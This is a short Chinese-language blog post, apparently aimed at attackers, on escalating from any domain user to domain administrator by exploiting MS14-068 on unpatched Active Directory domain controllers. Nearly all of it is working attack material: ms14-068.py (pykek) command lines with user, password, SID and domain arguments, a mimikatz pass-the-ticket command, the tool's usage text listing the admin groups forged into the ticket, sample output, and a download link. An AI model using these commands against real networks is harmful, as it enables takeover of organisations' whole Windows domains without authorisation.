提权:
会提权的兄弟应该都知道 域的权限是整个局域网最高统治权 当我们拿下一台服务器 只是域下的一台机器 这时候 就会想尽办法 拿下域控制服务器
不知道的可看本博客之前做的教程
可以让任何域内用户提升为域管理员
使用命令:
c:\python27\python.exe ms14-068.py -u [email protected] -p [email protected]# -s S-1-5-21-4191298166-3247023184-3514116461-1110 -d K8DNS.k8.local
mimikatz.exe “kerberos::ptc [email protected]” exit
ms14-068.py
Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :
Domain Users (513)
Domain Admins (512)
Schema Admins (518)
Enterprise Admins (519)
Group Policy Creator Owners (520)
USAGE:
ms14-068.py -u @ -s -d
OPTIONS:
-p
–rc4
Example usage :
Linux (tested with samba and MIT Kerberos)
[email protected]:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
Password:
[+] Building AS-REQ for dc-a-2003.dom-a.loc… Done!
[+] Sending AS-REQ to dc-a-2003.dom-a.loc… Done!
[+] Receiving AS-REP from dc-a-2003.dom-a.loc… Done!
[+] Parsing AS-REP from dc-a-2003.dom-a.loc… Done!
[+] Building TGS-REQ for dc-a-2003.dom-a.loc… Done!
[+] Sending TGS-REQ to dc-a-2003.dom-a.loc… Done!
[+] Receiving TGS-REP from dc-a-2003.dom-a.loc… Done!
[+] Parsing TGS-REP from dc-a-2003.dom-a.loc… Done!
[+] Creating ccache file ‘[email protected]’… Done!
[email protected]:~/sploit/pykek# mv [email protected] /tmp/krb5cc_0
On Windows
python.exe ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
mimikatz.exe “kerberos::ptc [email protected]” exit`
下载地址
https://github.com/bidord/pykek